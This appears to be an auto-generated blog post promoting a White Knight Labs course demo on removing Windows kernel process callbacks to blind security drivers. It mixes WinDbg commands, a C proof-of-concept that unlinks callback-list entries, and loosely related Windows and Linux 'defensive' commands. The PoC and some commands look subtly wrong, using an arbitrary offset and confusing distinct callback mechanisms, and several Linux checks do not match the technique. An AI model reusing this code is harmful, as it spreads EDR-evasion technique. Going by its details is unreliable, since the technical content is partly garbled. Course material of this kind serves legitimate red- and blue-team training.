White Knight Labs’ Offensive Development Course: Kernel Attacks Preview

White Knight Labs has released a demo showcasing their new kernel attack content as part of their Offensive Development course. The demo covers removing process callbacks to blind a driver to newly created processes, a critical technique for BYOVD (Bring Your Own Vulnerable Driver) attacks. The full content will debut at NorthSec.

Watch the Demo Here:

https://lnkd.in/eR42r97X

You Should Know:

1. Understanding Process Callbacks in Windows Kernel

Process callbacks are used by kernel drivers to monitor process creation/termination. Attackers may remove these callbacks to evade detection.

Key Commands (WinDbg):

!process 0 0 # List all processes 
dt nt!_EPROCESS <process_address> # Examine process structure 
dx -r1 (*((ntkrnlmp!_CALLBACK_OBJECT **)&nt!PspProcessType))->RegisteredCallbacks # List process callbacks 

#### **2. Removing Process Callbacks – Offensive Technique**

Attackers can manipulate the callback list to disable monitoring.

**Example (Windbg/PoC Code):**

#include <ntifs.h>

void RemoveProcessCallback() { 
PLIST_ENTRY callbackList = (PLIST_ENTRY)((PUCHAR)PsGetProcessType() + 0x8); 
PLIST_ENTRY entry = callbackList->Flink; 
while (entry != callbackList) { 
PLIST_ENTRY nextEntry = entry->Flink; 
RemoveEntryList(entry); 
entry = nextEntry; 
} 
} 

#### **3. Defensive Checks (Blue Team Perspective)**

Detect callback removal via kernel module integrity checks:

<h1>Check loaded drivers & callbacks (Windows)</h1>

fltmc filters 
driverquery /v 

**Linux Equivalent (Auditing Kernel Modules):**

lsmod # List loaded modules 
dmesg | grep -i "callback" # Check kernel logs 

### **What Undercode Say:**

Kernel attacks remain a high-risk vector in offensive security. Understanding callback mechanisms is crucial for both red and blue teams. Practicing in controlled environments (e.g., Windows Kernel Debugging with WinDbg) is essential.

**Additional Commands for Research:**

<h1>Windows:</h1>

!verifier # Driver Verifier checks 
!drvobj <driver> 2 # Inspect driver objects

<h1>Linux:</h1>

cat /proc/kallsyms | grep callback # Find callback symbols 
sudo sysctl -w kernel.modules_disabled=1 # Disable module loading (defense) 

### **Expected Output:**

A deeper understanding of kernel callback manipulation, along with practical commands for both exploitation and defense.

**Reference:**

• White Knight Labs Kernel Attack Demo
• Microsoft Kernel Callback Documentation

References:

Reported By: Jake Mayhew – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram